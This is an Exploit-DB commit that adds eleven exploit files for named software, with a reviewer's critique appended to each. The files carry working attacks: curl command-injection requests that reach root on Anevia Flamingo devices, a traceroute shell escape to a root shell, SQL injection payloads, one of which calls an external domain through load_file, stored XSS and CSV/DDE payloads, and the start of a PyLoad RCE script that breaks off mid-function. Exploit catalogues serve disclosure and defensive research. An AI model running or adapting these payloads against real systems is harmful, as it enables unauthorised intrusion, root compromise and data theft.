DB: 2023-06-15

11 changes to exploits/shellcodes/ghdb

Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)

Online Thesis Archiving System v1.0 - Multiple-SQLi

projectSend r1605 - CSV injection

projectSend r1605 - Stored XSS

Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Exploit-DB 2023-06-15 00:16:23 +00:00
parent ea8922f91d
commit 158fcdfd5c
11 changed files with 794 additions and 0 deletions


@ -0,0 +1,60 @@
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
Hardware revision: 1.1
SoapLive 2.4.0
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.14.29 (x86_64)
Apache/2.2.22 (Debian)
PHP/5.6.0-0anevia2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
13.04.2023
--
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
<td>uid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
---
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
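Review bot: the Summary paragraph ("Flamingo XL, a new modular and high-density IPTV head-end ... 4U rack hardware platform") describes the Flamingo XL, but this advisory is for the Flamingo XS 3.6.5; replace it with the XS product description or drop it, since the title, Affected version and Hardware revision lines are what the catalogue row is built from. The root claim also deserves one explicit sentence in Desc: the first curl shows the `ntp_hosts[]` backticks executing as `uid=33(www-data)`, and root is only reached in the second request because `sudo id` succeeds non-interactively from the web server process, so the finding is command injection as www-data combined with a sudo configuration that needs no password; stating that makes the "Root" in the title verifiable from the PoC. Minor: the prompt is `$` but the pipe uses Windows `findstr`; use `grep` or show a `>` prompt as the 3.6.20 file does.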


@ -0,0 +1,99 @@
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
Hardware revision 1.1, 1.0
SoapLive 2.4.1, 2.0.3
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
13.04.2023
--
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<
100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
* Connection #0 to host 192.168.1.1 left intact
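Review bot: the PoC line `curl -vL http://192.168.1.1/admin/time.php ... -d "ntp=\`id\`&request=ntp&update=Sync"` only works as written from a Windows `cmd.exe` prompt (hence the `>` prompt and `findstr`): in a POSIX shell the backticks inside double quotes are expanded locally, so `id` runs on the attacker's machine and the server receives its output instead of the command. The captured `Content-Length: 32` matches the literal 32-byte string with the backticks intact, which confirms the request was sent unexpanded; either single-quote the `-d` argument or escape the backticks, and say so, because readers will paste this into bash. Also worth a sentence in Desc: the `ntpdate[8964]: can't find host uid=0(root)` lines show the injected command runs as root directly, with no `sudo` step as in the XS 3.6.5 file, which is why this variant is root RCE on its own. Finally, Affected version lists `3.6.20, 3.2.9` with two hardware revisions and two SoapLive versions while the title names only 3.6.20; if 3.2.9 is confirmed affected by this injection, the catalogue description should say so.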


@ -0,0 +1,198 @@
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
Hardware revision 1.0
SoapLive 2.0.3
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
13.04.2023
--
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]
trace the route ip packets follow going to "host"
Options:
-F Set the don't fragment bit
-I Use ICMP ECHO instead of UDP datagrams
-l Display the ttl value of the returned packet
-d Set SO_DEBUG options to socket
-n Print hop addresses numerically rather than symbolically
-r Bypass the normal routing tables and send directly to a host
-v Verbose output
-m max_ttl Set the max time-to-live (max number of hops)
-p port# Set the base UDP port number used in probes
(default is 33434)
-q nqueries Set the number of probes per ``ttl'' to nqueries
(default is 3)
-s src_addr Use the following IP address as the source address
-t tos Set the type-of-service in probe packets to the following value
(default 0)
-w wait Set the time (in seconds) to wait for a response to a probe
(default 3 sec)
-g Specify a loose source route gateway (8 maximum)
uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x 19 root root 1024 Oct 3 2022 .
drwxr-xr-x 19 root root 1024 Oct 3 2022 ..
drwxr-xr-x 2 root root 1024 Oct 21 2013 bin
drwxrwxrwt 2 root root 40 Oct 3 2022 cores
drwxr-xr-x 13 root root 27648 May 22 00:53 dev
drwxr-xr-x 3 root root 1024 Oct 21 2013 emul
drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc
drwxr-xr-x 3 root root 1024 Oct 3 2022 home
drwxr-xr-x 11 root root 3072 Oct 21 2013 lib
lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib
drwx------ 2 root root 12288 Oct 21 2013 lost+found
drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt
drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions
dr-xr-xr-x 177 root root 0 Oct 3 2022 proc
drwxr-xr-x 4 root root 1024 Oct 21 2013 root
drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin
drwxr-xr-x 12 root root 0 Oct 3 2022 sys
drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr
drwxr-xr-x 14 root root 1024 Oct 21 2013 var
ls /var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php template
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pear upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php receive_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php include rescrambling.php webtv
check_state input.php resilience webtv.php
class js resilience.php xmltv.php
common license.php restart_service.php
config_snmp.php log.php set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21 2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding firewall mail timezone
config help passwd traceroute
date hostname persistent_logs upgrade
dbg-serial http ping uptime
dbg-set-oem igmpq route version
dbg-updates-log imp serial vlanconfig
dns ipconfig settings
ethconfig license sslconfig
exp log tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
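Review bot: the title "Remote Root Jailbreak" omits that the attacker needs a valid SSH login first (the transcript authenticates as `root@192.168.1.1` with a password before reaching the `Primary-XL>` restricted shell), so this is an authenticated restricted-shell escape rather than unauthenticated remote root; the other two Flamingo advisories carry "(Authenticated)" in the title and this one should too, since the catalogue row inherits it. The `Vendor:` line present in the other two files is missing here (the header jumps from Exploit Author to Product web page). The PoC itself is convincing: `tcpdump ;id` is rejected as an illegal token and `ping ;id` is treated as a hostname, while `traceroute ;id` prints the BusyBox usage and then `uid=0(root) gid=0(root)`, which indicates the traceroute wrapper under /usr/local/commands (listed later in the transcript) passes its arguments through a shell; naming that wrapper as the root cause in Desc would give the vendor a precise fix.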


@ -0,0 +1,19 @@
Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as =calc|a!z|
step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )
payload: =calc|a!z|
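Review bot: the repro has two "step 3" lines and no step 4, and the header "2. Technical Details & POC" has no section 1 before it; renumber. More important for triage: `=calc|a!z|` is a DDE payload, so whether the calculator launches depends on the administrator's spreadsheet application and its DDE settings, not on the server; "Tested on: Windows" should name the application the exported CSV was opened in. The description should also spell out the trust boundary the export crosses: a regular user sets the name field at `users-edit.php?id=2`, and the administrator's export of the action log at `actions-log.php` receives that value unescaped. Suggesting the server-side fix (prefix cells that begin with `=`, `+`, `-`, `@`, tab or CR with a single quote, or quote and escape them in the CSV writer) would make the report actionable for the project.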


@ -0,0 +1,46 @@
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs: Stored Xss
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as alert("xss"); and set public
5. And Save
6. Go to http://localhost (logout)
payload: alert("xss")
POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close
csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
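Review bot: as reproduced, the JavaScript is entered by an administrator into a feature whose documented purpose is to add custom JS to the public site (`custom-assets-add.php?language=js`, submitted with `location=public&position=head`), so the request at the bottom is the intended use of that page rather than an injection; an admin choosing to run `alert("xss")` in visitors' browsers is by design unless a lower-privileged role can reach `custom-assets-add.php`. The report should either show that a regular user account (the other projectSend file in this commit uses one) can submit this request, or be reclassified. Minor: the captured request mixes `sec-ch-ua-platform: "Linux"` with a `Windows NT 10.0` User-Agent, and the `PHPSESSID` and `csrf_token` values come from a live session; harmless on a local instance, but worth redacting in the template.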


@ -0,0 +1,17 @@
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra
--- Description ---
1) Login admin panel and go to Pages:
https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
2) Click edit button and write your payload in the Name field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
https://demos3.softaculous.com/Monstraggybvrnbr4/
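Review bot: step 2 ("Click edit button and write your payload in the Name field") does not say which page is being edited or where its Name is rendered, and no request or response is included, so the sink cannot be checked; the `"><script>alert(1)</script>` payload implies an attribute context (the leading `">` closes an attribute and its tag), so stating where the value appears on the public front page referenced in step 3 would let a reader verify it. Since the repro was done on a third-party Softaculous demo instance (`demos3.softaculous.com/Monstraggybvrnbr4/`), the "Tested :" line should make clear it was not a local install of the zip in Software Link.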


@ -0,0 +1,17 @@
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops
--- Description ---
1) Login admin panel and click Image Manager , choose Add Category :
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
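Review bot: the Image Manager "Add Category" form at `modules/system/admin.php?fct=images` is an administrator page, and the alert fires on the same admin page (`op=multiupload&imgcat_id=2`) when hovering the category name, so as described this is admin-to-admin stored XSS with no lower-privileged entry point; the title's "(Authenticated)" understates that, and the description should state that both the injection and the trigger are inside the admin panel, or show the category name rendered somewhere a non-admin or anonymous user sees it. The mouse-over trigger suggests the name is reflected unescaped into a `title` or tooltip attribute; including the request and the rendered HTML fragment would confirm the sink.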


@ -0,0 +1,79 @@
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain. The application interacted with that domain, indicating that
the injected SQL query was executed. The attacker can dump all
information from the
database of this system, and then he can use it for dangerous and
malicious purposes!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
OR NOT 1404=1404-- Eotr
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
## Time spend:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
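Review bot: the signature block ("System Administrator - Infrastructure Engineer" through `nu11secur1ty <http://nu11secur1ty.com/>`) appears twice at the end of the file; drop the second copy. The fenced block is tagged ```mysql but contains sqlmap output, not SQL; use a plain fence. The payloads still carry the author's Burp Collaborator address (`itvBGDRM@burpcollaborator.net`) and the `load_file` UNC hostname from the scan, which will not resolve for readers; replace them with placeholders. Note also that the `load_file('\\\\...\\ock')` out-of-band check only proves injection on a Windows-hosted MySQL that can reach the attacker's host, while the boolean-, error- and time-based payloads below it are what support the "dump all information" claim on any host. Finally, Exploit-DB already lists 50597 ("Online Thesis Archiving System 1.0 - SQLi Authentication Bypass") for the same product; the description should state whether this `password` parameter is the same injection point and, if so, what is new here.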


@ -0,0 +1,196 @@
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/
--- Description ---
1) Login admin page , choose Content , Articles section :
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button
https://release-demo.textpattern.co/index.php?id=2
--- Request ---
POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"
2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"
article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"
edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"
"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"
1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"
1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"
4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"
articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"
article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"
2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"
06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"
13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"
19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"
35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"
25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"
alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"
Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"
async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"
fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--
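Review bot: the request stores a raw `"><script>alert(document.cookie)</script>` in `Excerpt` from a `managing-editor179` account, but Textpattern lets article authors with publishing rights write HTML into Body and Excerpt by design, and Exploit-DB already has 49617 ("Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)") for this field; the report should name the lowest role that reproduces it and explain why 4.8.8 is a distinct finding, otherwise it duplicates 49617 and is likely to be treated as intended behaviour by the vendor. Smaller points: the title says "(Authenticated)" while step 1 says "Login admin page", so specify the role; and the live `txp_login`, `txp_login_public` and `_txp_token` values from the release demo are included in the request, harmless for the demo site but better redacted.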


@ -0,0 +1,53 @@
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()
def doRequest(url):
try:
res = requests.get(url)
if res.status_code == 200:
return True
else:
return False
